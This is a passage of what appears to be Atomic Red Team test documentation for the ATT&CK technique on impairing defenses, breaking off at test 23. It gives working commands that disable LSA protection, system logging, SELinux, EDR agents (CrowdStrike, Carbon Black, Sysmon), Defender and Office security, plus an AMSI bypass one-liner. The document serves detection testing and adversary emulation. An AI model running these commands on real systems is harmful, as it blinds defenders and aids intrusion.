> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1685), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tools exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
>
> Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)
>
> On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
>
> In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
>
> Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
>
> Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
[Source](https://attack.mitre.org/techniques/T1685)
## Atomic Tests
- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection)
- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility)
- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility)
- [Atomic Test #4: Disable syslog](#atomic-test-1-disable-syslog)
- [Atomic Test #5: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd)
- [Atomic Test #6: Disable Cb Response](#atomic-test-3-disable-cb-response)
- [Atomic Test #7: Disable SELinux](#atomic-test-4-disable-selinux)
- [Atomic Test #8: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux)
- [Atomic Test #9: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response)
- [Atomic Test #10: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch)
- [Atomic Test #11: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella)
- [Atomic Test #12: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper)
- [Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos)
- [Atomic Test #14: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver)
- [Atomic Test #15: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon)
- [Atomic Test #16: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed)
- [Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key)
- [Atomic Test #18: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service)
- [Atomic Test #19: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell)
- [Atomic Test #20: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt)
- [Atomic Test #21: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry)
- [Atomic Test #22: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features)
- [Atomic Test #23: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files)
- [Atomic Test #24: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service)
- [Atomic Test #25: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows)
- [Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder)
- [Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension)
- [Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process)
- [Atomic Test #29: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule)
- [Atomic Test #30: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism)
- [Atomic Test #31: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun)
- [Atomic Test #32: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab)
- [Atomic Test #33: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth)
- [Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell)
- [Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
- [Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
- [Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
- [Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
- [Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
- [Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder)
- [Atomic Test #41: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks)
- [Atomic Test #42: Clear History](#atomic-test-39-clear-history)
- [Atomic Test #43: Suspend History](#atomic-test-40-suspend-history)
- [Atomic Test #44: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request)
- [Atomic Test #45: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache)
- [Atomic Test #46: Disable Memory Swap](#atomic-test-43-disable-memory-swap)
- [Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci)
- [Atomic Test #48: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com)
- [Atomic Test #49: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion)
- [Atomic Test #50: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos)
- [Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe)
- [Atomic Test #52: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell)
- [Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli)
- [Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune)
- [Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo)
- [Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key)
- [Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd)
- [Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell)
- [Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd)
- [Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell)
- [Atomic Test #61: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze)
- [Atomic Test #62: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux)
- [Atomic Test #63: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host)
- [Atomic Test #64: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host)
- [Atomic Test #65: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host)
- [Atomic Test #66: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host)
- [Atomic Test #67: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows)
- [Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd)
- [Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell)
- [Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd)
- [Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell)
- [Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd)
- [Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell)
- [Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd)
- [Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell)
- [Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table)
### Atomic Test #1: Windows Disable LSA Protection
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
**Supported Platforms:** Windows
**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
```
### Atomic Test #2: Disable journal logging via systemctl utility
The atomic test disables the journal logging using built-in systemctl utility
**Supported Platforms:** Linux
**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo systemctl stop systemd-journald #disables journal logging
```
#### Cleanup Commands
```sh
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
```
### Atomic Test #3: Disable journal logging via sed utility
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
**Supported Platforms:** Linux
**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
```
#### Cleanup Commands
```sh
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
```
### Atomic Test #4: Disable syslog
Disables syslog collection
**Supported Platforms:** Linux
**auto_generated_guid:** `4ce786f8-e601-44b5-bfae-9ebb15a7d1c8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| package_checker | Package checking command for linux. | string | (rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed)|
| package_installer | Package installer command for linux. Default yum | string | (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)|
| flavor_command | Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog | string | systemctl stop rsyslog ; systemctl disable rsyslog|
| cleanup_command | Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on | string | systemctl start rsyslog ; systemctl enable rsyslog|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
#{flavor_command}
```
#### Cleanup Commands
```sh
#{cleanup_command}
```
#### Dependencies: Run with `sh`!
##### Description: Package with rsyslog must be on system
###### Check Prereq Commands
```sh
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```
###### Get Prereq Commands
```sh
sudo #{package_installer}
```
### Atomic Test #5: Disable syslog (freebsd)
Disables syslog collection
**Supported Platforms:** Linux
**auto_generated_guid:** `db9de996-441e-4ae0-947b-61b6871e2fdf`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
service syslogd stop
sysrc syslogd_enable="NO"
```
#### Cleanup Commands
```sh
sysrc syslogd_enable="YES"
service syslogd start
```
### Atomic Test #6: Disable Cb Response
Disable the Cb Response service
**Supported Platforms:** Linux
**auto_generated_guid:** `ae8943f7-0f8d-44de-962d-fbc2e2f03eb8`
#### Attack Commands: Run with `sh`!
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
```
### Atomic Test #7: Disable SELinux
Disables SELinux enforcement
**Supported Platforms:** Linux
**auto_generated_guid:** `fc225f36-9279-4c39-b3f9-5141ab74f8d8`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
setenforce 0
```
#### Cleanup Commands
```sh
setenforce 1
```
#### Dependencies: Run with `sh`!
##### Description: SELinux must be installed
###### Check Prereq Commands
```sh
which setenforce
```
###### Get Prereq Commands
```sh
echo "SELinux is not installed"; exit 1
```
### Atomic Test #8: Stop Crowdstrike Falcon on Linux
Stop and disable Crowdstrike Falcon on Linux
**Supported Platforms:** Linux
**auto_generated_guid:** `828a1278-81cc-4802-96ab-188bf29ca77d`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
```
#### Cleanup Commands
```sh
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
```
### Atomic Test #9: Disable Carbon Black Response
Disables Carbon Black Response
**Supported Platforms:** macOS
**auto_generated_guid:** `8fba7766-2d11-4b4a-979a-1e3d9cc9a88c`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```
#### Cleanup Commands
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```
### Atomic Test #10: Disable LittleSnitch
Disables LittleSnitch
**Supported Platforms:** macOS
**auto_generated_guid:** `62155dd8-bb3d-4f32-b31c-6532ff3ac6a3`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
#### Cleanup Commands
```sh
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
### Atomic Test #11: Disable OpenDNS Umbrella
Disables OpenDNS Umbrella
**Supported Platforms:** macOS
**auto_generated_guid:** `07f43b33-1e15-4e99-be70-bc094157c849`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
#### Cleanup Commands
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
### Atomic Test #12: Disable macOS Gatekeeper
Disables macOS Gatekeeper
**Supported Platforms:** macOS
**auto_generated_guid:** `2a821573-fb3f-4e71-92c3-daac7432f053`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo spctl --master-disable
```
#### Cleanup Commands
```sh
sudo spctl --master-enable
```
### Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
**Supported Platforms:** macOS
**auto_generated_guid:** `b3e7510c-2d4c-4249-a33f-591a2bc83eef`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist|
| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
```
#### Cleanup Commands
```sh
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}
```
### Atomic Test #14: Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
**Supported Platforms:** Windows
**auto_generated_guid:** `811b3e76-c41b-430c-ac0d-e2380bfaa164`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
fltmc.exe unload #{sysmon_driver}
```
#### Cleanup Commands
```cmd
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u > nul 2>&1
"PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i > nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: Sysmon must be downloaded
###### Check Prereq Commands
```powershell
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr /i Sysmon 2> nul") -or (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe")) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Sysmon.zip" "PathToAtomicsFolder\..\ExternalPayloads\Sysmon" -Force
```
##### Description: sysmon must be Installed
###### Check Prereq Commands
```powershell
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
```powershell
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ & "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i}
```
##### Description: sysmon filter must be loaded
###### Check Prereq Commands
```powershell
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
```powershell
if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -u
& "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe" -accepteula -i
}else{
sysmon -u
sysmon -accepteula -i
}
```
### Atomic Test #15: Uninstall Sysmon
Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
**auto_generated_guid:** `a316fb2e-5344-470d-91c1-23e15c374edc`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder&#92;T1685&#92;bin&#92;sysmon.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
sysmon -u
```
#### Cleanup Commands
```cmd
sysmon -i -accepteula >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: Sysmon executable must be available
###### Check Prereq Commands
```powershell
if(cmd /c where sysmon) {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
```
##### Description: Sysmon must be installed
###### Check Prereq Commands
```powershell
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
```
###### Get Prereq Commands
```powershell
cmd /c sysmon -i -accepteula
```
### Atomic Test #16: AMSI Bypass - AMSI InitFailed
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
**auto_generated_guid:** `695eed40-e949-40e5-b306-b4031e4154bd`
#### Attack Commands: Run with `powershell`!
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
#### Cleanup Commands
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
### Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
**Supported Platforms:** Windows
**auto_generated_guid:** `13f09b91-c953-438e-845b-b585e51cac9b`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
#### Cleanup Commands
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
```
### Atomic Test #18: Disable Arbitrary Security Windows Service
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
**Supported Platforms:** Windows
**auto_generated_guid:** `a1230893-56ac-4c81-b644-2108e982f8f5`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to stop | string | McAfeeDLPAgentService|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
```
#### Cleanup Commands
```cmd
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
```
### Atomic Test #19: Tamper with Windows Defender ATP PowerShell
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** Windows
**auto_generated_guid:** `6b8df440-51ec-4d53-bf83-899591c9b5d7`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
```
#### Cleanup Commands
```powershell
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
```
### Atomic Test #20: Tamper with Windows Defender Command Prompt
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
will be displayed twice and the WinDefend service status will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `aa875ed4-8935-47e2-b2c5-6ec00ab220d2`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
```
#### Cleanup Commands
```cmd
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
```
### Atomic Test #21: Tamper with Windows Defender Registry
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
**Supported Platforms:** Windows
**auto_generated_guid:** `1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
```
#### Cleanup Commands
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```
### Atomic Test #22: Disable Microsoft Office Security Features
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
**auto_generated_guid:** `6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7`
#### Attack Commands: Run with `powershell`!
```powershell
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
```
### Atomic Test #23: Remove Windows Defender Definition Files
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
